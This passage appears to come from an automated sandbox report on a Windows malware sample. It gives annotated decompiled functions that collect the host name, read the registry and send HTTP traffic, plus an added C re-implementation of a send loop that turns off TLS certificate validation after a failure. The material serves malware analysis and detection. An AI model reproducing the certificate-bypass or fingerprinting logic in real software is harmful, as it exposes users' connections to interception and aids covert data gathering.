                            • Opcode ID: 92a0fdcf71ea6e05e6d6ead6807e89a959610d7d86b2d3cc139125bad46b039e
                            • Instruction ID: a73142c4074ffafe23c7d063738fd2faa0f65c0740fa93259b6a609efddda7c1
                            • Opcode Fuzzy Hash: 92a0fdcf71ea6e05e6d6ead6807e89a959610d7d86b2d3cc139125bad46b039e
                            • Instruction Fuzzy Hash: C0214F75A00619EFCB04DBA4C888D9AF779EFC8704B148684FD15DB324D674ED45DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00F124C2
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SafeArrayDestroy.OLEAUT32(?), ref: 00F1250F
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: df9cae534191d5394f24095055541d7d0b68843e913f763cd5eaaecdbc26c3f9
                            • Instruction ID: 8f08fbd436198ef1adb76cd4d4e3f0d1c95facf04c3a5a9566b79e1cfccdb551
                            • Opcode Fuzzy Hash: df9cae534191d5394f24095055541d7d0b68843e913f763cd5eaaecdbc26c3f9
                            • Instruction Fuzzy Hash: A1113C7290010EBFDB01DFA8CC45EEEBBB9AF08310F058065FA04E6161E3759A55EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00F1A6E1), ref: 00F12645
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SysFreeString.OLEAUT32(00000000), ref: 00F12685
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: 16b03af98a962e7033cfd349769a9f2f2378f1b325cde35df0d9b94aef5813dc
                            • Instruction ID: 03cce507b32c4cd7d79103e16e688de603015c75fad185714f438189fcf1a382
                            • Opcode Fuzzy Hash: 16b03af98a962e7033cfd349769a9f2f2378f1b325cde35df0d9b94aef5813dc
                            • Instruction Fuzzy Hash: E0014B7291060EBFCB519FA9DC08DEBBBB9EF48350B014061FA05E6120D7749A15ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00F140AC(void* __ecx) {
                            				signed int _v8;
                            				signed int _t10;                  // used below; missing from the raw output
                            				void* _t15;
                            				void* _t19;
                            				void* _t20;
                            				void* _t22;
                            				intOrPtr* _t23;

                            				// Returns the host's fully qualified DNS name in a heap buffer, using the usual
                            				// two-call size query. Format 3 is ComputerNameDnsFullyQualified.
                            				_t23 = __imp__;                   // GetComputerNameExA (refs 00F140C4 / 00F140E1 in the APIs list)
                            				_t20 = 0;
                            				_v8 = _v8 & 0;                    // buffer size 0 for the size query
                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed -- fails with no buffer and leaves the required length in _v8
                            				_t10 = _v8;
                            				if(_v8 != 0) {
                            					_t20 = E00F155DC(_t10 + 1);   // RtlAllocateHeap (see APIs), one byte extra for the terminator
                            					if(_t20 != 0) {
                            						_t15 =  *_t23(3, _t20,  &_v8); // executed -- second call fills the buffer
                            						if(_t15 != 0) {
                            							 *((char*)(_v8 + _t20)) = 0;   // NUL-terminate at the returned length
                            						} else {
                            							E00F16DFA(_t20);          // RtlFreeHeap
                            							_t20 = 0;
                            						}
                            					}
                            				}
                            				return _t20;                      // heap string, or NULL on failure
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f140b1 0x00f140bc 0x00f140be 0x00f140c4 0x00f140c6 0x00f140cb 0x00f140d4 0x00f140d8
                            0x00f140e1 0x00f140e5 0x00f140f4 0x00f140e7 0x00f140e8 0x00f140ed 0x00f140ed 0x00f140e5
                            0x00f140d8 0x00f140fd

                            APIs
                            • GetComputerNameExA.KERNEL32(00000003,00000000,00F163F4,74ECC740,00000000,?,?,00F163F4), ref: 00F140C4
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetComputerNameExA.KERNEL32(00000003,00000000,00F163F4,00F163F5,?,?,00F163F4), ref: 00F140E1
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: d63781d7fb4b45471c682ce3e089367cadc81751f30ef77d9d8890e6a3db97e0
                            • Instruction ID: ef140cfe6737de479859aa59c89c50108db84b31915d1ab0f9592dee9e41071c
                            • Opcode Fuzzy Hash: d63781d7fb4b45471c682ce3e089367cadc81751f30ef77d9d8890e6a3db97e0
                            • Instruction Fuzzy Hash: 67F09027A04119ABEB10D6AA8C00EEF36ADDBC9750F250069BA14D3140EA70EF46A660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F1230A(signed int __edx, void* __edi, intOrPtr _a4) {
                            				void* _t3;
                            				void* _t5;
                            				void* _t8;
                            				void* _t9;
                            				void* _t10;
                            				signed int _t11;

                            				// Module initialisation: private heap, start timestamp, then the subcalls that do the work.
                            				_t11 = __edx;
                            				_t3 = HeapCreate(0, 0x400000, 0); // executed -- private, growable heap with 4 MiB initially committed
                            				 *0xf1d270 = _t3;                 // heap handle used by the module's allocator (RtlAllocateHeap( *0xf1d270, ...) in E00F178A8)
                            				if(_t3 == 0) {
                            					_t9 = 8;                      // ERROR_NOT_ENOUGH_MEMORY; this code reports Win32 error codes, not HRESULTs
                            					return _t9;
                            				}
                            				 *0xf1d160 = GetTickCount();     // start time (ms since boot) kept in a global
                            				_t5 = E00F12CBF(_a4);
                            				if(_t5 == 0) {
                            					E00F12EBD(_t10, __edi, _a4); // executed
                            					if(E00F13AF1(_t10) != 0) {
                            						 *0xf1d298 = 1; // executed
                            					}
                            					_t8 = E00F1587D(_t11); // executed
                            					return _t8;
                            				}
                            				return _t5;                       // non-zero status from E00F12CBF
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f1230a 0x00f12313 0x00f1231b 0x00f12320 0x00f12324 0x00000000 0x00f12324 0x00f12331
                            0x00f12336 0x00f1233d 0x00f12343 0x00f1234f 0x00f12351 0x00f12351 0x00f1235b 0x00000000
                            0x00f1235b 0x00f12360

                            APIs
                            • HeapCreate.KERNEL32(00000000,00400000,00000000,00F14154,?), ref: 00F12313
                            • GetTickCount.KERNEL32 ref: 00F12327
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 89eb98a3a1603c565c3f693502000a319277fd6f15e512c3ecf8899172805aee
                            • Instruction ID: 64ca410397ce84673baa5bc9558aee0ab2ec9f05e1f71ea38a53a7ee591150de
                            • Opcode Fuzzy Hash: 89eb98a3a1603c565c3f693502000a319277fd6f15e512c3ecf8899172805aee
                            • Instruction Fuzzy Hash: DAE0D831684318EAE7A06FF09D077DD76B47F08B54F118418F559D11A0EBBDD4A0BB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 32%
                            			E00F18F5E(intOrPtr _a4, signed int _a8) {
                            				long _v8;
                            				long _v12;
                            				char _v16;
                            				void* _t14;
                            				long _t15;
                            				char* _t17;
                            				intOrPtr* _t19;
                            				signed int _t22;

                            				// Send loop with one TLS downgrade. The two imports are not resolved in the dump; the
                            				// 7-argument shape (handle, headers, length, 0, 0, 0, 0) and the WinHTTP error codes
                            				// handled below are consistent with WinHttpSendRequest, and the option call with
                            				// WinHttpSetOption. Treat those names as interpretation.
                            				_t19 = __imp__; // 0x6ff6e700
                            				_t22 =  ~_a8;                     // with the sbb below: _t22 = (_a8 != 0) ? -1 : 0, i.e. "NUL-terminated" length when headers are supplied
                            				_v12 = 0;                         // set once the certificate checks have been relaxed
                            				asm("sbb esi, esi");
                            				while(1) {
                            					_v8 = 0;
                            					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                            					if(_t14 != 0) {
                            						break;                    // sent
                            					}
                            					_t15 = GetLastError();
                            					_v8 = _t15;
                            					if(_t15 != 0x2f8f) {          // 0x2f8f = 12175 = ERROR_WINHTTP_SECURE_FAILURE
                            						if(_t15 == 0x2f00) {      // 0x2f00 = 12032 = ERROR_WINHTTP_RESEND_REQUEST: plain retry
                            							continue;
                            						}
                            					} else {
                            						_v16 = 0x3300;            // SECURITY_FLAG_IGNORE_UNKNOWN_CA | _CERT_WRONG_USAGE | _CERT_CN_INVALID | _CERT_DATE_INVALID
                            						if(_v12 == 0) {           // only one downgrade attempt; a second TLS failure is returned
                            							_t17 =  &_v16;
                            							__imp__(_a4, 0x1f, _t17, 4);   // option 0x1f = WINHTTP_OPTION_SECURITY_FLAGS, 4-byte value
                            							if(_t17 == 0) {
                            								_v8 = GetLastError();
                            							} else {
                            								_v12 = 1;
                            								continue;         // resend with certificate validation disabled
                            							}
                            						}
                            					}
                            					L9:
                            					return _v8;                   // 0 on success, otherwise the last error
                            				}
                            				goto L9;
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f18f65 0x00f18f72 0x00f18f74 0x00f18f77 0x00f18fbc 0x00f18fc4 0x00f18fca 0x00f18fce
                            0x00000000 0x00000000 0x00f18f7b 0x00f18f86 0x00f18f89 0x00f18fba 0x00000000 0x00000000
                            0x00f18f8b 0x00f18f8e 0x00f18f95 0x00f18f99 0x00f18fa2 0x00f18faa 0x00f18fd8 0x00f18fac
                            0x00f18fac 0x00000000 0x00f18fac 0x00f18faa 0x00f18f95 0x00f18fdb 0x00f18fe2 0x00f18fe2
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: a0ca517f84ad6a2970f9945daea0fb7e207cb44239eb05aa24ddf9305145d959
                            • Instruction ID: a3e28a86c51da8242e4b6ca31f63d7d192945b75b6cd6a189c1710fe6e6afe18
                            • Opcode Fuzzy Hash: a0ca517f84ad6a2970f9945daea0fb7e207cb44239eb05aa24ddf9305145d959
                            • Instruction Fuzzy Hash: 04012535D4010CFBDB109F95DD48ADFBFB9EB48750F108166E501D2150CB708A86EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%
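The send loop in E00F18F5E above reacts to a TLS failure by relaxing the certificate checks once and resending. The following C is an added example, not code from the sample or from this report: it carries that control flow and its constants into a form that runs offline against a simulated transport. `sim_send` and `sim_set_option` stand in for the two imports whose names the dump does not resolve (an assumption of the example), and `send_with_tls_downgrade` and `run_script` are names chosen here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values taken from the decompiled loop; the names are the documented
 * WinHTTP constants for those values. */
#define ERROR_WINHTTP_RESEND_REQUEST   0x2f00u   /* 12032 */
#define ERROR_WINHTTP_SECURE_FAILURE   0x2f8fu   /* 12175 */
#define WINHTTP_OPTION_SECURITY_FLAGS  0x1fu     /* 31 */
#define SECURITY_FLAG_IGNORE_UNKNOWN_CA        0x0100u
#define SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE  0x0200u
#define SECURITY_FLAG_IGNORE_CERT_CN_INVALID   0x1000u
#define SECURITY_FLAG_IGNORE_CERT_DATE_INVALID 0x2000u
#define SAMPLE_SECURITY_FLAGS          0x3300u   /* the literal stored in _v16 */

/* Simulated request (assumption: stands in for the real WinHTTP handle and the
 * two unresolved imports). 'script' lists the outcome of successive send
 * attempts: 0 = success, otherwise the error code GetLastError would return. */
struct sim_request {
    const uint32_t *script;
    size_t script_len;
    size_t sends;             /* send attempts made */
    int option_calls;         /* how often the security option was set */
    uint32_t option_value;    /* flags value last set */
    uint32_t option_error;    /* nonzero: make the option call fail with this */
};

static bool sim_send(struct sim_request *r, uint32_t *err)
{
    *err = r->sends < r->script_len ? r->script[r->sends] : 0;
    r->sends++;
    return *err == 0;
}

static bool sim_set_option(struct sim_request *r, uint32_t option,
                           const void *value, size_t len, uint32_t *err)
{
    if (option != WINHTTP_OPTION_SECURITY_FLAGS || len != sizeof(uint32_t)) {
        *err = 87;                                /* ERROR_INVALID_PARAMETER */
        return false;
    }
    r->option_calls++;
    if (r->option_error != 0) {
        *err = r->option_error;
        return false;
    }
    r->option_value = *(const uint32_t *)value;
    return true;
}

/* Control flow of E00F18F5E. Returns 0 when the send succeeded, otherwise the
 * last error. Exactly one certificate-check downgrade is attempted; a second
 * SECURE_FAILURE is passed back to the caller unchanged. */
uint32_t send_with_tls_downgrade(struct sim_request *r)
{
    bool downgraded = false;                      /* _v12 */
    for (;;) {
        uint32_t err = 0;
        if (sim_send(r, &err))
            return 0;
        if (err == ERROR_WINHTTP_RESEND_REQUEST)
            continue;                             /* plain retry */
        if (err != ERROR_WINHTTP_SECURE_FAILURE || downgraded)
            return err;
        uint32_t flags = SAMPLE_SECURITY_FLAGS;   /* _v16 = 0x3300 */
        if (!sim_set_option(r, WINHTTP_OPTION_SECURITY_FLAGS, &flags, sizeof flags, &err))
            return err;                           /* option call failed: report its error */
        downgraded = true;                        /* _v12 = 1, then retry the send */
    }
}

/* Runs one scripted scenario; the filled-in request is left in *r. */
uint32_t run_script(const uint32_t *script, size_t n, uint32_t option_error,
                    struct sim_request *r)
{
    struct sim_request init = { script, n, 0, 0, 0, option_error };
    *r = init;
    return send_with_tls_downgrade(r);
}

int main(void)
{
    /* Constructed scenario: first attempt fails the certificate check, second succeeds. */
    static const uint32_t script[] = { ERROR_WINHTTP_SECURE_FAILURE, 0 };
    struct sim_request r;
    uint32_t rc = run_script(script, 2, 0, &r);
    printf("rc=%u sends=%zu option_calls=%d flags=0x%x\n",
           rc, r.sends, r.option_calls, r.option_value);
    return rc != 0;
}
```

The behaviour worth confirming is in the scenarios: after one ERROR_WINHTTP_SECURE_FAILURE the flags 0x3300 are set and the request is resent, a second failure is returned so the loop cannot spin forever, and a failing option call surfaces its own error. Because the flag set ignores an unknown CA and a mismatched or expired certificate, interception with an untrusted certificate alone does not stop this traffic from going out.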

                            C-Code - Quality: 92%
                            			E00F178A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed int _v12;
                            				void* _t32;
                            				signed int _t37;
                            				signed int _t39;
                            				signed char _t45;
                            				void* _t49;
                            				char* _t51;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t69;

                            				// Serialises __eax bytes at _a4 as a comma-separated decimal list ("12,0,255"),
                            				// returning the buffer through _a8 and its length through _a12.
                            				_v12 = _v12 & 0x00000000;                     // return code, 0 = success
                            				_t69 = __eax;                                 // byte count
                            				_t32 = RtlAllocateHeap( *0xf1d270, 0, __eax << 2); // executed -- 4 bytes per input byte, enough for "255,"
                            				_t49 = _t32;
                            				if(_t49 == 0) {
                            					_v12 = 8;                                 // ERROR_NOT_ENOUGH_MEMORY
                            				} else {
                            					 *_a8 = _t49;
                            					do {
                            						_t45 =  *_a4;                         // next input byte
                            						asm("cdq");
                            						_t65 = 0x64;
                            						_t37 = (_t45 & 0x000000ff) / _t65;    // hundreds digit
                            						_v5 = _t37;
                            						if(_t37 != 0) {
                            							 *_t49 = _t37 + 0x30;             // emit as ASCII
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t37 * 0x9c;        // 0x9c == -100 mod 256: strip the hundreds in 8-bit arithmetic
                            						}
                            						asm("cdq");
                            						_t66 = 0xa;
                            						_t39 = (_t45 & 0x000000ff) / _t66;    // tens digit
                            						if(_t39 != 0 || _v5 != _t39) {        // emit it unless hundreds and tens are both zero
                            							 *_t49 = _t39 + 0x30;
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t39 * 0xf6;        // 0xf6 == -10 mod 256
                            						}
                            						_a4 = _a4 + 1;
                            						 *_t49 = _t45 + 0x30;                 // units digit
                            						 *(_t49 + 1) = 0x2c;                  // ','
                            						_t49 = _t49 + 2;
                            						_t69 = _t69 - 1;
                            					} while (_t69 != 0);                      // note: a zero count is not handled; the loop runs at least once
                            					_t51 = _t49 - 1;                          // back over the trailing ','
                            					 *_a12 = _t51 -  *_a8;                    // length without terminator
                            					 *_t51 = 0;                               // replace the last ',' with NUL
                            				}
                            				return _v12;
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f178ad 0x00f178b2 0x00f178c0 0x00f178c6 0x00f178ca 0x00f1793b 0x00f178cc 0x00f178d0
                            0x00f178d3 0x00f178d6 0x00f178dd 0x00f178de 0x00f178df 0x00f178e3 0x00f178e6 0x00f178ed
                            0x00f178f3 0x00f178f4 0x00f178f4 0x00f178fb 0x00f178fc 0x00f178fd 0x00f17901 0x00f1790d
                            0x00f17913 0x00f17914 0x00f17914 0x00f17916 0x00f1791c 0x00f1791e 0x00f17923 0x00f17924
                            0x00f17924 0x00f1792a 0x00f17933 0x00f17935 0x00f17938 0x00f17947

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F178C0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 36b7828edd275e209a0dcb3e0bb051e3fcc15c703ef8023cbdf393902911c289
                            • Instruction ID: 8db3a31f5e8cba0d1d5f33992a5df73415b9cd99615ce4af1c4040589fa264c9
                            • Opcode Fuzzy Hash: 36b7828edd275e209a0dcb3e0bb051e3fcc15c703ef8023cbdf393902911c289
                            • Instruction Fuzzy Hash: CE1129716893449FEB058F2DC851BE97BB5DB23368F24408EE4848F292C277894FC760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E00F13196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				intOrPtr _v12;
                            				void* _v18;
                            				short _v20;
                            				intOrPtr _t4;  // added: used below but not declared in the decompiler output
                            				intOrPtr _t15;
                            				short _t17;
                            				intOrPtr _t19;
                            				intOrPtr _t20; // added: used below but not declared in the decompiler output
                            				short _t23;
                            
                            				_t23 = 0;
                            				_v20 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t15 =  *0xf1d2b8; // 0x48da5a8
                            				_t4 = _t15 + 0xf1e39c; // 0x57f8944
                            				_t20 = _t4;
                            				_t17 = E00F15A5E(_t4, _a4, 0x80000002, _a8, _t15 + 0xf1e124, _a12, _t4,  &_v20); // executed
                            				if(_t17 < 0) {
                            					_t23 = _t17;
                            				} else {
                            					if(_v20 != 8) {
                            						_t23 = 1;
                            					} else {
                            						_t19 = E00F16794(_t20, _v12);
                            						if(_t19 == 0) {
                            							_t23 = 8;
                            						} else {
                            							 *_a16 = _t19;
                            						}
                            						__imp__#6(_v12); // OLEAUT32 ordinal 6, resolved as SysFreeString in the APIs list below
                            					}
                            				}
                            				return _t23;
                            			}


                            APIs
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                              • Part of subcall function 00F16794: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00F13D8B,?,00000000,?), ref: 00F1679D
                              • Part of subcall function 00F16794: memcpy.NTDLL(00000000,?,?,?,00000002,?,?,00F13D8B,?,00000000,?), ref: 00F167C7
                              • Part of subcall function 00F16794: memset.NTDLL ref: 00F167DB
                            • SysFreeString.OLEAUT32(00000000), ref: 00F131FC
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 715675c1c4b14dce0418bb61645ea188b78a4faa9a6a7e7991ca81e1b14d6797
                            • Instruction ID: 76272d78f5de0a9bf9afc02f2ba3faa40a344413f97bc1413306465e52c3fbaa
                            • Opcode Fuzzy Hash: 715675c1c4b14dce0418bb61645ea188b78a4faa9a6a7e7991ca81e1b14d6797
                            • Instruction Fuzzy Hash: 98017132900019BFCB11AFA8CC05DEEBBB8FB04710F004555E911E6071D371AA99AB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E00F1447C(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                            				char _v8;
                            				void* _t14;
                            				intOrPtr _t17;
                            				void* _t20;
                            				void* _t26;
                            
                            				_push(__ecx);
                            				if(_a4 == 0 || __eax == 0) {
                            					_t26 = 0x57;
                            				} else {
                            					_t14 = E00F178A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                            					_t26 = _t14;
                            					if(_t26 == 0) {
                            						_t17 =  *0xf1d2b8; // 0x48da5a8
                            						_t20 = E00F1456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t17 + 0xf1ea1c, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                            						_t26 = _t20;
                            						RtlFreeHeap( *0xf1d270, 0, _a4); // executed
                            					}
                            				}
                            				return _t26;
                            			}


                            APIs
                              • Part of subcall function 00F178A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F178C0
                              • Part of subcall function 00F1456E: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00F145A2
                              • Part of subcall function 00F1456E: StrStrA.SHLWAPI(00000000,?), ref: 00F145AF
                              • Part of subcall function 00F1456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 00F145CE
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00F12EB0), ref: 00F144D2
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 17ec399724f8b7f8009c05776114f358fb44bd1325391c6b09a43721b4f213ad
                            • Instruction ID: e4813ca542edabc59a30f0a7b23fd93e356ad471f3458cfa09e70f77705b0af2
                            • Opcode Fuzzy Hash: 17ec399724f8b7f8009c05776114f358fb44bd1325391c6b09a43721b4f213ad
                            • Instruction Fuzzy Hash: 7F016976100208FFCB12CF44DC00EEA7BB9EBA4360F118025F94996160E775EA95EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E00F18B51(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				intOrPtr _t14;
                            				void* _t16;
                            				intOrPtr _t17; // added: passed to E00F15A5E below but not declared in the decompiler output
                            				void* _t18;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					_t18 =  *0xf1d0bc(_a8, _a12,  &_a4);
                            					if(_t18 == 0) {
                            						RegCloseKey(_a4);
                            					}
                            					L4:
                            					return _t18;
                            				}
                            				_t14 =  *0xf1d2b8; // 0x48da5a8
                            				_t16 = E00F15A5E(_t17, _a4, _a8, _a12, _t14 + 0xf1e180, 0, 0, 0); // executed
                            				_t18 = _t16;
                            				if(_t18 == 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}


                            APIs
                            • RegCloseKey.ADVAPI32(00000000,?,00F16941,3D00F1C0,00000000,80000002,?,80000002,?,?,?,00F14993,80000002), ref: 00F18B9A
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CloseFreeString
                            • String ID:
                            • API String ID: 3574410727-0
                            • Opcode ID: 6bc86d8dbe331d4f5d4c625614250e4117096a303ed55dcfca0b64a8dde652f4
                            • Instruction ID: 95ed84d7c8b305e4b829e5a1f115c9d3c9517d3c35832bf402a5e8e89b828a5d
                            • Opcode Fuzzy Hash: 6bc86d8dbe331d4f5d4c625614250e4117096a303ed55dcfca0b64a8dde652f4
                            • Instruction Fuzzy Hash: A5F05E3250161CFFDB228F40DC00FE97B69AF047A0F058160FE089A160C771DD61ABD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F16DFA(void* _a4) {
                            				char _t2;
                            
                            				_t2 = RtlFreeHeap( *0xf1d270, 0, _a4); // executed
                            				return _t2;
                            			}


                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 72d5982f51d8c0eaa40d951e9c7496c40a6f0cb0d2904b452dab19ef86cf12be
                            • Instruction ID: a069068ce699ca2cf94b7e4e6a1d03157886ab76ad0aa7a1dd9447c07dcbd765
                            • Opcode Fuzzy Hash: 72d5982f51d8c0eaa40d951e9c7496c40a6f0cb0d2904b452dab19ef86cf12be
                            • Instruction Fuzzy Hash: 40B01275040204EBCE114B10DE08F457B31B764700F03C011B20040074C2324430FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F155DC(long _a4) {
                            				void* _t2;
                            
                            				_t2 = RtlAllocateHeap( *0xf1d270, 0, _a4); // executed
                            				return _t2;
                            			}


                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
